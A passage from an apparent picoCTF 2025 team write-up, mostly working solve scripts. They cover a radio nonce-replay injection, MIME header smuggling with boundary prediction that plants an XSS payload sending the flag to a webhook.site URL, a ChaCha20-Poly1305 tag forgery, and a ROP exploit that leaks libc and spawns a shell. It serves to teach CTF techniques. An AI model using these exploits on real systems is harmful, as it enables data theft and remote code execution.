inject_radio_message(secure_data_request[29], dst=BOT, msg_type="secure_data_response") # now we're at nonce 30 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_ack[30], dst=BOT, msg_type="secure_data_response") # now we're at nonce 31 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_request[31], dst=BOT, msg_type="secure_data_response") # now we're at nonce 32 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_ack[32], dst=BOT, msg_type="secure_data_response") # now we're at nonce 33 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_response[33], dst=BOT) # now we're at nonce 34 wait_for_radio_message("secure_data") inject_radio_message(secure_data_ack[34], dst=BOT) # now we're at nonce 35 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_request[35], dst=BOT, msg_type="secure_data_response") # now we're at nonce 36 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_ack[36], dst=BOT, msg_type="secure_data_response") # now we're at nonce 37 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_request[37], dst=BOT, msg_type="secure_data_response") # now we're at nonce 38 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_ack[38], dst=BOT, msg_type="secure_data_response") # now we're at nonce 39 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_response[39], dst=BOT) # now we're at nonce 40 wait_for_radio_message("secure_data") inject_radio_message(secure_data_ack[40], dst=BOT) # now we're at nonce 41 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_response[41], dst=BOT) # now we're at nonce 42 wait_for_radio_message("secure_data") inject_radio_message(secure_data_ack[42], dst=BOT) # now we're at nonce 43 wait_for_radio_message("secure_data_request") inject_radio_message(secure_data_response[43], dst=BOT) quit("done") ``` ## Secure Email Service ### surveying the challenge The first thing I (voxal) looked at was how to obtain the flag. The goal was getting the admin to open a signed message with an XSS payload in it `email.html` ```js= if (parsed.html) { const signed = await getSigned(msg.data, await rootCert()); if (signed) { const { html } = await parse(signed); const shadow = content.attachShadow({ mode: 'closed' }); shadow.innerHTML = `<style>:host { all: initial }</style>${html}`; } else { content.style.color = 'red'; content.innerText = 'invalid signature!'; } } else { const pre = document.createElement('pre'); pre.style.overflow = 'auto'; pre.innerText = parsed.text; content.appendChild(pre); } ``` If both the email had HTML, and it was signed, it would embed the HTML into the page giving us XSS. The first thing we decided to look at were the WASM binaries because another challenge (pachinko revisited) involved reverse engineering a WASM binary, quickly we realized that 1) the OpenSSL binary was basically just the CLI tool, so that wasn't vulnerable, and 2) the parser was based on a rust crate called [mail-parser](https://lib.rs/crates/mail-parser) (obtained by running strings on the binary). The first thing we looked at was whether it was possible to somehow forge the signature, or some other way to solve the challenge through cryptography. We quickly abandoned this both because it would involve finding a vulnerability in `openssl`, and since I'm quite familiar with the authors' challenges, and I doubted that they would make this a crypto challenge. I had a revelation when looking at the javascript of `reply.html`: ```js= import { email, requireLogin, send } from './src/api.js' import { parse } from './src/email.js' await requireLogin(); const id = new URL(window.location.href).searchParams.get('id'); if (!/^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/.test(id)) { alert('invalid id'); location.href = '/inbox.html'; } const parsed = await parse((await email(id)).data); const subject = `Re: ${parsed.subject}`; document.getElementById('subject').innerText = subject; document.getElementById('reply').onsubmit = async e => { e.preventDefault(); const body = document.querySelector('[name=body]').value; try { await send(parsed.from, subject, body); // this line } catch(e) { alert(e); return; } alert('sent!'); location.href = '/inbox.html'; } ``` What I realized was it was using the `parsed.from` from the parsed email that the reply email would be sent to, so if we somehow manage to modify that header, we would be able to force the admin bot to send a signed email to itself, and since signed messages would get embedded, if we could control the body of the email, we would be able to get XSS. In order to control the body, we needed to first predict the boundary that python generates in the multipart message, so I set my teammates HELLOPERSON and smashmaster to working to crack python random to predict the boundary. ![predict boundary write your email to fake a "from" header to be admin@ses. change the subject header and next predicted boundary to inject xss payload into the reply email ask the admin bot to reply to that email, sending xss to itself proc admin bot again ](https://hackmd.io/_uploads/rkMiDZG2kl.png) ### smuggling the header Since this was our attack vector, we started to look at the email generation code. ```py= def generate_email( sender: str, recipient: str, subject: str, content: str, html: bool = False, sign: bool = False, cert: str = '', key: str = '', ) -> str: msg = MIMEMultipart() msg['From'] = sender msg['To'] = recipient msg['Subject'] = subject msg.attach(MIMEText(content)) if html: msg.attach(MIMEText(content, 'html')) if sign: return smail.sign_message(msg, key.encode(), cert.encode()).as_string() return msg.as_string() ``` We copied the logic into a solve script file, and tried spoofing a from header in the Subject field ```py= msg = MIMEMultipart(boundary="fixed") msg['From'] = "user@ses" msg['To'] = "admin@ses" msg['Subject'] = """ABC From: admin@ses """ msg.attach(MIMEText("text")) print(msg.as_string()) ``` Run: ``` Traceback (most recent call last): File "/home/voxal/code/ctf/pico-2025/secure-email-service/tester.py", line 13, in <module> print(msg.as_string()) ~~~~~~~~~~~~~^^ ... File "/usr/lib/python3.13/email/header.py", line 385, in encode raise HeaderParseError("header value appears to contain " "an embedded header: {!r}".format(value)) email.errors.HeaderParseError: header value appears to contain an embedded header: 'ABC\nFrom: admin@ses' ``` Hmm nope, looks like there's some logic checking for the exact thing I'm doing. Although the `README` of `mail-parser` does say > In general, this library abides by the Postel's law or Robustness Principle which states that an implementation must be conservative in its sending behavior and liberal in its receiving behavior. This means that mail-parser will make a best effort to parse non-conformant e-mail messages as long as these do not deviate too much from the standard. so we could try some variations of the header and see if the parser is lenient enough to parse the extra `From` header. Maybe a space after the header name? ```py= msg['Subject'] = f"""ABC From : admin@ses """ ``` gives: ``` email.errors.HeaderWriteError: folded header contains newline: 'Subject: ABC\nFrom : admin@ses\n' ``` Different error, still doesn't work. Maybe a space before the header ```py= msg['Subject'] = f"""ABC From: admin@ses """ ``` gives: ``` Content-Type: multipart/mixed; boundary="fixed" MIME-Version: 1.0 From: user@ses To: admin@ses Subject: ABC From: admin@ses --fixed Content-Type: text/plain; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit text --fixed-- ``` Hey! It produced an email, lets try parsing it. We can write this file to `email.eml`, and using wasmtime to run the parser (this is the same way the javascript does it). ```bash ❯ wasmtime --dir . frontend/public/wasm/parser.wasm { "from": "user@ses", "html": null, "subject": "ABC From: admin@ses", "text": "text", "to": "admin@ses" } ``` Nope, the from field is still `"user@ses"`, and instead the header got put in the `subject`. We tried more things, but none of them seemed to work, we were at a block, until a teammate reminded me that I was on Python 3.13 while the challenge was running Python 3.11. I tried doing a space after the header (because we tested it, and the parser would accept it) and well... ```py= msg['Subject'] = f"""ABC From : admin@ses """ ``` gives: ``` Content-Type: multipart/mixed; boundary="fixed" MIME-Version: 1.0 From: user@ses To: admin@ses Subject: ABC From : admin@ses --fixed Content-Type: text/plain; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit text --fixed-- ``` Haha.. It worked! and the parser parses it like a new header as well! ```bash ❯ wasmtime --dir . frontend/public/wasm/parser.wasm { "from": "admin@ses", "html": null, "subject": "ABC", "text": "text", "to": "admin@ses" } ``` ### controlling the body Next we needed a way to control the body of the reply email somehow. Again, the only field we had control over was the subject. So it should just be as easy as adding a `\n\n` to the `Subject` header to get control of the body right? ```py= msg = MIMEMultipart(boundary="fixed") msg['From'] = "user@ses" msg['To'] = "admin@ses" msg['Subject'] = """ABC From : admin@ses --fixed xss payload goes here """ msg.attach(MIMEText("text")) print(msg.as_string()) ``` gives: ``` Content-Type: multipart/mixed; boundary="fixed" MIME-Version: 1.0 From: user@ses To: admin@ses Subject: ABC From : admin@ses --fixed xss payload goes here --fixed Content-Type: text/plain; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit text --fixed-- ``` At this point I was confusing myself between the inital and reply email, so even if this worked, the reply wouldn't be hyjacked, I lose track of these things pretty easily. Well regardless, looks like python also strips this as well. What a shame. Well lets find a way to bypass this. We found this [github issue](https://github.com/python/cpython/issues/121650) that seemed to be exactly what we needed. By using MIME encoding, hopefully we could smuggle in 2 newlines into the reply email. ```py= msg = MIMEMultipart(boundary="fixed") msg['From'] = "user@ses" msg['To'] = "admin@ses" msg['Subject'] = """ABC =?UTF-8?Q?=0A?=--replybound =?UTF-8?Q?=0A?=xss payload goes here From : admin@ses """ eml = open("email.eml", "w") eml.write(msg.as_string()) eml.close() sub = subprocess.run("wasmtime --dir . frontend/public/wasm/parser.wasm", shell=True, encoding="UTF-8", capture_output=True) print(sub.stdout) print(sub.stderr) obj = json.loads(sub.stdout) print("vvvvvvvv REPLY BELOW vvvvvvvv") print() rep = MIMEMultipart(boundary="replybound") rep['From'] = "user@ses" rep['To'] = obj["from"] rep['Subject'] = f"Re: {obj['subject']}" print(rep.as_string()) ``` Oh yeah we updated our script so we could see how the reply email looked so we could confirm we were able to hyjack the body of the email. Either way, running this gave us: ``` ^^^ initial email cut for brevity --- { "from": "admin@ses", "html": null, "subject": "ABC \n --replybound \n xss payload goes here", "text": "text", "to": "admin@ses" } vvvvvvvv REPLY BELOW vvvvvvvv Content-Type: multipart/mixed; boundary="replybound" MIME-Version: 1.0 From: user@ses To: admin@ses Subject: Re: ABC --replybound xss payload goes here --replybound --replybound-- ``` Yeah I should have expected this, we did manage to smuggle newlines to the reply email though! (A side note, if you look at the `\n` in the parsed message, you'll see that there are spaces on both sides of it, this annoyed us since we couldn't control reply headers until we figured this out. We realized we could just encode the entire message) Anyways we spent quite a while banging our heads trying to figure out how to get 2 newlines without python stripping them out. We gave up on this approach after looking at the source code ```py= for line in lines[1:]: formatter.newline() if charset.header_encoding is not None: formatter.feed(self._continuation_ws, ' ' + line.lstrip(), charset) else: sline = line.lstrip() fws = line[:len(line)-len(sline)] formatter.feed(fws, sline, charset) if len(lines) > 1: formatter.newline() ``` This code ensures that there is text in the line before adding **a single new line** (`formatter.newline()`), so there would be no way of smuggling our way into the body. ### a new way forward I did a second pass of the source code and, realized something very suspicious. ```py= @app.post('/api/send') async def send( user: Annotated[User, Depends(db.request_user)], to: Annotated[str, Body()], subject: Annotated[str, Body()], body: Annotated[str, Body()] ): # make sure the email we're sending to is valid recipient = await db.get_user(to) if len(user.public_key) == 0: msg = util.generate_email( sender=user.username, recipient=recipient.username, subject=subject, content=body, ) else: msg = util.generate_email( sender=user.username, recipient=recipient.username, subject=subject, # vvvvvvv content=template.render( title=subject, content=body ), # ^^^^^^^ html=True, sign=True, cert=user.public_key, key=user.private_key ) email_id = str(uuid.uuid4()) await db.send_email(recipient, email_id, msg) return email_id ``` Sending an admin email would use the jinja template! This would give us access to the body of the reply. Removing all the styles and other misc crap in the template we're left with ```html= <!DOCTYPE html> <html> <body> <div class="email-container"> <h1>{{ title }}</h1> <pre>{{ content }}</pre> </div> </body> </html> ``` We have control over the title! We can't just toss a XSS payload at this thing since they're using `{{ }}` so we'll need to be more creative. The idea that formed was to make our subject have an encoded chunk so when it was decoded in the reply and put into the template, the parser would be tricked into thinking that our subject in the template was a new multipart chunk so when the parser parsed our email, it would parse the chunk to be the body of the email. ```py= from email.mime.text import MIMEText from email.mime.multipart import MIMEMultipart import os import subprocess import json import base64 from jinja2 import Template template = Template(open('./template.jinja2', 'r').read(), autoescape=True) def encode(text): return f"=?UTF-8?B?{base64.b64encode(text.encode()).decode()}?=" content_type = '\nContent-Type : multipart/mixed; boundary="replybound"' replybound = '' # the base64 encoded thingy is our payload, we seperate it out for # our final solve script payload = '\nSubject : \n--replybound\nContent-Type : text/html\nContent-Transfer-Encoding : base64\n\nPHNjcmlwdD5mZXRjaCgiLy93ZWJob29rLnNpdGUvMWEwZGY1MjYtMDllZi00NTRhLTlkNTMtY2ViOTllMGUxYzJmLz8iICsgbG9jYWxTdG9yYWdlLmZsYWcpPC9zY3JpcHQ+\n--replybound\n' lb = "\n" msg = MIMEMultipart(boundary="fixed") msg['From'] = "user@ses" msg['To'] = "admin@ses" msg['Subject'] = f"""ABC{encode(replybound)}{encode(payload)}{encode(content_type)} From : admin@ses """ print("vvvv FINAL OUTPUT BELOW") print(f"""ABC{encode(replybound)}{encode(payload)}{encode(content_type)} From : admin@ses """) print("^^^^ FINAL OUTPUT ABOVE") msg.attach(MIMEText("text")) print(msg.as_string()) eml = open("email.eml", "w") eml.write(msg.as_string()) eml.close() sub = subprocess.run("wasmtime --dir . frontend/public/wasm/parser.wasm", shell=True, encoding="UTF-8", capture_output=True) print(sub.stdout) print(sub.stderr) obj = json.loads(sub.stdout) print("vvvvvvv SUBJECT BELOW vvvvvv") print(obj['subject']) print("vvvvvvvv REPLY BELOW vvvvvvvv") print() rep = MIMEMultipart(boundary="replybound") rep['From'] = "admin@ses" rep['To'] = obj["from"] rep['Subject'] = f"Re: {obj['subject']}" admin_content = '\n\n'.join([ 'We\'ve gotten your message and will respond soon.', 'Thank you for choosing SES!', 'Best regards,', 'The Secure Email Service Team' ]) admin_rendered = template.render( title=obj['subject'], content=admin_content ) rep.attach(MIMEText(admin_rendered)) # rep.attach(MIMEText(admin_rendered, 'html')) print(rep.as_string()) ``` Here's what the reply looks like: ``` Content-Type: multipart/mixed; boundary="replybound" MIME-Version: 1.0 From: admin@ses To: admin@ses Subject: Re: ABC Subject : --replybound Content-Type : text/html Content-Transfer-Encoding : base64 PHNjcmlwdD5mZXRjaCgiLy93ZWJob29rLnNpdGUvMWEwZGY1MjYtMDllZi00NTRhLTlkNTMtY2ViOTllMGUxYzJmLz8iICsgbG9jYWxTdG9yYWdlLmZsYWcpPC9zY3JpcHQ+ --replybound Content-Type : multipart/mixed; boundary="replybound" --replybound Content-Type: text/plain; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit <!DOCTYPE html> <html> <body> <div class="email-container"> <h1>ABC Subject : --replybound Content-Type : text/html Content-Transfer-Encoding : base64 PHNjcmlwdD5mZXRjaCgiLy93ZWJob29rLnNpdGUvMWEwZGY1MjYtMDllZi00NTRhLTlkNTMtY2ViOTllMGUxYzJmLz8iICsgbG9jYWxTdG9yYWdlLmZsYWcpPC9zY3JpcHQ+ --replybound Content-Type : multipart/mixed; boundary=&#34;replybound&#34;</h1> <pre>We&#39;ve gotten your message and will respond soon. Thank you for choosing SES! Best regards, The Secure Email Service Team</pre> </div> </body> </html> --replybound-- ``` And lets take the reply email and put it into the parser... ```bash ❯ wasmtime --dir . frontend/public/wasm/parser.wasm { "from": "admin@ses", "html": "<script>fetch(\"//webhook.site/1a0df526-09ef-454a-9d53-ceb99e0e1c2f/?\" + localStorage.flag)</script>", "subject": null, "text": "<!DOCTYPE html>\n<html>\n<body>\n <div class=\"email-container\">\n <h1>ABC\nSubject :", "to": "admin@ses" } ``` Hey would you look at that! We got it! ### we did infact, not get it. After testing this against a local instance, well lets just say we forgot that the email was signed. The concept still had merit though, we just needed to adapt it to the format of the signed email. Since any headers we injected were put at the top level of the signed email, we could no longer control the `Content-Type` of the inner email, and thus couldn't change the boundary to what we needed it to be. This meant that we needed to predict the boundary, which was possible through randcracking. My teammates unvariant and HELLOPERSON wrote the randcracker for me. Looking at the [cpython source](https://github.com/python/cpython/blob/72e5b25efb580fb1f0fdfade516be90d90822164/Lib/email/generator.py#L387), we can see that the boundary is generated using `random.randrange(sys.maxsize)`. Since `sys.maxsize` is 2^63-1, this should reliably generate 63 'clean' bits from the MT19937 PRNG. Since each block from MT19937 is supposed to be 32 bits, this means we are uncertain about one bit from each set of 2 consecutive blocks, which means we should use a symbolic mersenne twister cracker (which likely uses z3). Searching around for one, we can find [this](https://github.com/icemonster/symbolic_mersenne_cracker/blob/main/main.py) implementation, which is perfect for our purposes. To predict the boundary, we first need to collect a sufficient number of samples to recover the MT19937 state. In theory, this can be done using 624 32 bit outputs, but to be safe, we collected over 1,000 63 bit outputs. Feeding these inputs into the randcracker in the right format (*cough cough `bin` doesn't pad*), we can predict the next outputs of `random.randrange(sys.maxsize)` and thus predict the boundary! Alright, now that we were able to predict the boundary, we were ready to rip the exploit. Our final payload was as follows: ```py= def encode(text): return f"=?UTF-8?B?{base64.b64encode(text.encode()).decode()}?=" boundary = "===============7570496185067173140==" js_payload = '<img src=x onerror=fetch("https://webhook.site/1a0df526-09ef-454a-9d53-ceb99e0e1c2f/?"+localStorage.flag,{mode:"no-cors"}) />' encoded_js_payload = base64.b64encode(js_payload.encode()).decode() content_type = '\nContent-Type : multipart/mixed; boundary="="' replybound = '' payload = f'\nSubject : \n--{boundary}\nContent-Type : text/html\nContent-Transfer-Encoding : base64\n\n{encoded_js_payload}\n--{boundary}\n' lb = "\n" msg = MIMEMultipart(boundary="fixed") msg['From'] = "user@ses" msg['To'] = "admin@ses" msg['Subject'] = f"""ABC{encode(replybound)}{encode(payload)}{encode(content_type)} From : admin@ses """ ``` We need the extra `Content-Type : multipart/mixed; boundary="="` since the extra chunk we injected required a injected `Content-Type : text/html`, so we need to remedy that, luckily the mail parser was lenient enough to let this boundary through (it doesn't conform to spec at all lol). Anyways now that we had our exploit we sent it at the server, hoping for a response. ![image](https://hackmd.io/_uploads/r1VW8cz2kl.png) Any day now.. ... ... Oh whats that? ```py= @classmethod def _make_boundary(cls, text=None): # Craft a random boundary. If text is given, ensure that the chosen # boundary doesn't appear in the text. token = random.randrange(sys.maxsize) boundary = ('=' * 15) + (_fmt % token) + '==' if text is None: return boundary b = boundary counter = 0 while True: cre = cls._compile_re('^--' + re.escape(b) + '(--)?$', re.MULTILINE) if not cre.search(text): break b = boundary + '.' + str(counter) counter += 1 return b ``` Okay so it turns out that python still really does not like us, and it tries to prevent us from doing this exact thing by checking the body for the pattern `^--{boundary}(--)?$`. But hey, remember how lenient the parser is? ```py= boundary = "===============7570496185067173140==a" ``` And send it off again, and soon enough we get our flag :D sorry for this writeup being so long, there are so many different things we tried and i wanted to document them all, i pity whoever needs to read this. (you guys did say step by step right?) ## Cha Cha Slide Opening the source, we can very quickly ascertain that the goal of this challenge is to forge a ChaCha20-Poly1305 tag, given two known messages tagged with the same nonce. Forging the encrypted message itself given known plaintext and identical keystream is quite trivial, so we will not focus on forging this part of the final message. Having previously played PlaidCTF 2024, I recalled that there was a very similar challenge, [DHCPPP](https://github.com/sajjadium/ctf-archives/blob/main/ctfs/PlaidCTF/2024/DHCPPP/dhcppp.c31987bce7265cdacd3329769acada11b26f8d57cc6a9676e3a6dda3b5c90200.py), with the very similar premise of forging a ChaCha20-Poly1305 message. So, I decided to use a few of the easily available solve scripts online ([1](https://sectt.github.io/writeups/Plaid24/DHCPPP/exploit.py), [2](https://hackmd.io/@tranminhprvt01/PlaidCTF2024)) as a starting point for solving the challenge. Since the first one appears to be using some specialized technique abusing the fact that the DHCPPP packets were mostly identical, we will be reusing most of the functions/functionality from the second writeup. Let's try to understand the theory behind the solve. Firstly, we need to understand what, exactly, the data that goes into the Poly1305 authentication is. ![image](https://hackmd.io/_uploads/Sy0gRWGnJe.png) This diagram on Wikipedia shows it quite well. There is some "Associated Data" (which is empty for our purposes), which is concatenated with null bytes to pad it to a multiple of 16, then the ciphertext of the ChaCha20, that is then padded to a multiple of 16 bytes with null bytes again, which is then followed by the lengths of the associated data and the ciphertext. The lengths are handled by `struct.pack('<Q', len(data))`, which packs the length into an 8 byte LE format. Note that after this process, the total length of the data should be a multiple of 16. After wrangling with the inputs to the Poly1305 hash, it's quite simple to find the secret key `r` given two (input, output) pairs with the same key. At the start of the Poly1305 hash, the input is split into coefficients to a polynomial, where a secret constant derived from the original ChaCha20 keystream is also added. This polynomial is evaluated at `r` modulo 2^130-5, and the last 128 bits are used as the hash. To recover `r` from two such (input, output) pairs, we can do the following: 1. Subtract the outputs. This cancels out the secret constant. 2. Brute force the truncated bits. There are only 9 values to test, as the truncation modifies the difference by a value `k` at maximum, where -4\*2^128 < k < 4\*2^128. Call the real output `c`. 3. Subtract the input polynomials. Call this new polynomial `f`. 4. Find the values where `f(r) = c`. Note that since `r` is restricted in which bits can be 1, we can often identify the only possible candidate for `r`. Now, we can forge the ciphertext using typical stream cipher techniques, and then use the ciphertext and our recovered (r, s) values to forge a Poly1305 tag. Submitting this to the server (making sure that all our variable names are correct), we receive the flag. Solve script is below. ```python= import struct from pwn import * from Crypto.Util.number import * from sage.all import * context.log_level = 'critical' P = 2**130 - 5 p = PolynomialRing(GF(2**130-5), 'x') x = p.gen() def pad16(data): """Return padding for the Associated Authenticated Data""" #print(data, type(data)) if len(data) % 16 == 0: return bytes(0) else: return bytes(16-(len(data)%16)) def get_blocks(c): data = b"" mac_data = c + pad16(c) mac_data += struct.pack('<Q', len(data)) mac_data += struct.pack('<Q', len(c)) c = mac_data real_c = [] for i in range(0, len(c), 16): n = c[i:i+16] n = n + b'\x01' n += (17-len(n)) * b'\x00' assert len(n) == 17 real_c.append(int.from_bytes(n, byteorder='little')) return real_c def tag(c, r, s): mod2 = 2**128 real_c = get_blocks(c) c = real_c n = len(c) res = 0 for i in range(n): res += c[i] res = (r*res) % P return (res + s) % mod2 def atk(pair1, pair2, nonce, m3): m1, c1, t1 = pair1 m2, c2, t2 = pair2 t1 = int.from_bytes(t1, byteorder='little') t2 = int.from_bytes(t2, byteorder='little') keystream = bytes(a ^ b for a, b in zip(c1, m1)) c3 = bytes(a ^ b for a, b in zip(m3, keystream)) f1 = 0 f2 = 0 for i in get_blocks(c1): f1 += i f1 *= x for i in get_blocks(c2): f2 += i f2 *= x rs = [] for k in range(-4, 5): rhs = t1 - t2 + 2**128 * k f = rhs - (f1 - f2) for r, _ in f.roots(): if int(r) & 0x0ffffffc0ffffffc0ffffffc0fffffff == int(r): s = (t1 - int(f1(r))) % 2**128 rs.append((r, s)) r, s = map(int, rs[0]) t3 = tag(c3, r, s) t3 = long_to_bytes(t3)[::-1] return c3, t3 messages = [ b"Did you know that ChaCha20-Poly1305 is an authenticated encryption algorithm?", b"That means it protects both the confidentiality and integrity of data!" ] goal = "But it's only secure if used correctly!" # io = remote("activist-birds.picoctf.net", 61677) io = process(['python3', 'picoserver.py']) io.recvuntil(b"Ciphertext (hex): ") a = io.recvline().strip().decode() c1 = bytes.fromhex(a) io.recvuntil(b"Ciphertext (hex): ") a = io.recvline().strip().decode() c2 = bytes.fromhex(a) def extract(pkt): ct = pkt[:-28] tag = pkt[-28:-12] nonce = pkt[-12:] return ct, tag, nonce c1, t1, n1 = extract(c1) c2, t2, n2 = extract(c2) n = n1 m1, m2 = messages m3 = goal.encode() c3, t3 = atk((m1, c1, t1), (m2, c2, t2), n, m3) forged = c3 + t3 + n io.sendline(forged.hex()) io.interactive() ``` ## handoff Looking at the source, we can see an obvious buffer overflow into the feedback array. However using the buffer overflow we can control `rbp`, `rip`, and nothing else. While this is exploitable it is annoying and not very fun. Instead we exploit the negative indexing into the `entries` array, which writes more data. Writing to `entries[-1]` allows you to overwrite the `fgets` return address and set up a ROP chain in `entries[0]`. Since the binary is compiled without PIE, we don't need to leak anything to do ROP. The handout does not provide remote libc, so we leak GOT entries using a ROP chain `pop rdi ; puts`. Throwing the leaked addresses into `libc.rip` gives hits for `ubuntu 2.35`. Now we can calculate libc base from the libc leaks and pop a shell with `system("/bin/sh")` ### solve script ```py= from pwn import * context.terminal = ["kitty"] context.binary = file = ELF("./handoff") libc = ELF("./libc.so.6") script = """ # b *0x0040136e # b *fgets+0xfe c """ if not args.REMOTE: p = gdb.debug("./handoff", gdbscript=script) def add(name: bytes): p.sendlineafter(b"app\n", b"1") p.sendlineafter(b": \n", name) def edit(idx: int, data: bytes): p.sendlineafter(b"app\n", b"2") p.sendlineafter(b"?\n", f"{idx}".encode()) p.sendlineafter(b"?\n", data) poprdi = 0x0000000000401473 puts = 0x00401090 def connect(): if args.REMOTE: return remote("shape-facility.picoctf.net", "50867") def arbread(addr: int): # global p # p = connect() payload = flat({ 0x00: poprdi + 1, 0x08: poprdi + 1, 0x10: p64(number=file.sym.main) }) add(payload) payload = flat({ 0x28: poprdi, 0x30: addr, 0x38: puts, }) edit(-1, payload) leak = u64(p.recvline()[:-1].ljust(8, b"\x00")) log.info(f"{leak = :#x}") # p.close() return leak # arbread(file.got.fgets) 0x71eff9797380 # arbread(file.got.puts) # 0x7992b5c88380 # arbread(file.got.getchar) # 0x7476c2d32380 # arbread(file.got.fflush) # 0x7a1490b36380 # arbread(file.got.setvbuf) # 0x7e85d23cb380 if args.REMOTE: p = connect() fgets = arbread(file.got.fgets) libcbase = fgets - 0x7f380 libc.address = libcbase log.info(f"{libcbase = :#x}") # adjusted = (fgets - 0x80000) & ~0xfff # arbread(fgets) p.recvuntil(b"option\n") payload = flat({ 0x00: libc.sym.system }) add(payload) payload = flat({ 0x28: poprdi, 0x30: next(libc.search(b"/bin/sh\x00")), 0x38: poprdi + 1, }) edit(-1, payload) p.interactive() ```

Import from clipboard

Paste your markdown or webpage here...

Advanced permission required

Your current role can only read. Ask the system administrator to acquire write and comment permission.

This team is disabled

Sorry, this team is disabled. You can't edit this note.

This note is locked

Sorry, only owner can edit this note.

Reach the limit

Sorry, you've reached the max length this note can be.
Please reduce the content or divide it to more notes, thank you!

Import from Gist

Import from Snippet

or

Export to Snippet

Are you sure?

Do you really want to delete this note?
All users will lose their connection.

Create a note from template

Create a note from template

Oops...
This template has been removed or transferred.
Upgrade
All
  • All
  • Team
No template.

Create a template

Upgrade

Delete template

Do you really want to delete this template?
Turn this template into a regular note and keep its content, versions, and comments.

This page need refresh

You have an incompatible client version.
Refresh to update.
New version available!
See releases notes here
Refresh to enjoy new features.
Your user state has changed.
Refresh to load new user state.

Sign in

Forgot password

or

By clicking below, you agree to our terms of service.

Sign in via Facebook Sign in via Twitter Sign in via GitHub Sign in via Dropbox Sign in with Wallet
Wallet ( )
Connect another wallet

New to HackMD? Sign up

Help

  • English
  • 中文
  • Français
  • Deutsch
  • 日本語
  • Español
  • Català
  • Ελληνικά
  • Português
  • italiano
  • Türkçe
  • Русский
  • Nederlands
  • hrvatski jezik
  • język polski
  • Українська
  • हिन्दी
  • svenska
  • Esperanto
  • dansk

Documents

Help & Tutorial

How to use Book mode

Slide Example

API Docs

Edit in VSCode

Install browser extension

Contacts

Feedback

Discord

Send us email

Resources

Releases

Pricing

Blog

Policy

Terms

Privacy

Cheatsheet

Syntax Example Reference
# Header Header 基本排版
- Unordered List
  • Unordered List
1. Ordered List
  1. Ordered List
- [ ] Todo List
  • Todo List
> Blockquote
Blockquote
**Bold font** Bold font
*Italics font* Italics font
~~Strikethrough~~ Strikethrough
19^th^ 19th
H~2~O H2O
++Inserted text++ Inserted text
==Marked text== Marked text
[link text](https:// "title") Link
![image alt](https:// "title") Image
`Code` Code 在筆記中貼入程式碼
```javascript
var i = 0;
```
var i = 0;
:smile: :smile: Emoji list
{%youtube youtube_id %} Externals
$L^aT_eX$ LaTeX
:::info
This is a alert area.
:::

This is a alert area.

Versions and GitHub Sync
Get Full History Access

  • Edit version name
  • Delete

revision author avatar     named on  

More Less

Note content is identical to the latest version.
Compare
    Choose a version
    No search result
    Version not found
Sign in to link this note to GitHub
Learn more
This note is not linked with GitHub
 

Feedback

Submission failed, please try again

Thanks for your support.

On a scale of 0-10, how likely is it that you would recommend HackMD to your friends, family or business associates?

Please give us some advice and help us improve HackMD.

 

Thanks for your feedback

Remove version name

Do you want to remove this version name and description?

Transfer ownership

Transfer to
    Warning: is a public team. If you transfer note to this team, everyone on the web can find and read this note.

      Link with GitHub

      Please authorize HackMD on GitHub
      • Please sign in to GitHub and install the HackMD app on your GitHub repo.
      • HackMD links with GitHub through a GitHub App. You can choose which repo to install our App.
      Learn more  Sign in to GitHub

      Push the note to GitHub Push to GitHub Pull a file from GitHub

        Authorize again
       

      Choose which file to push to

      Select repo
      Refresh Authorize more repos
      Select branch
      Select file
      Select branch
      Choose version(s) to push
      • Save a new version and push
      • Choose from existing versions
      Include title and tags
      Available push count

      Pull from GitHub

       
      File from GitHub
      File from HackMD

      GitHub Link Settings

      File linked

      Linked by
      File path
      Last synced branch
      Available push count

      Danger Zone

      Unlink
      You will no longer receive notification when GitHub file changes after unlink.

      Syncing

      Push failed

      Push successfully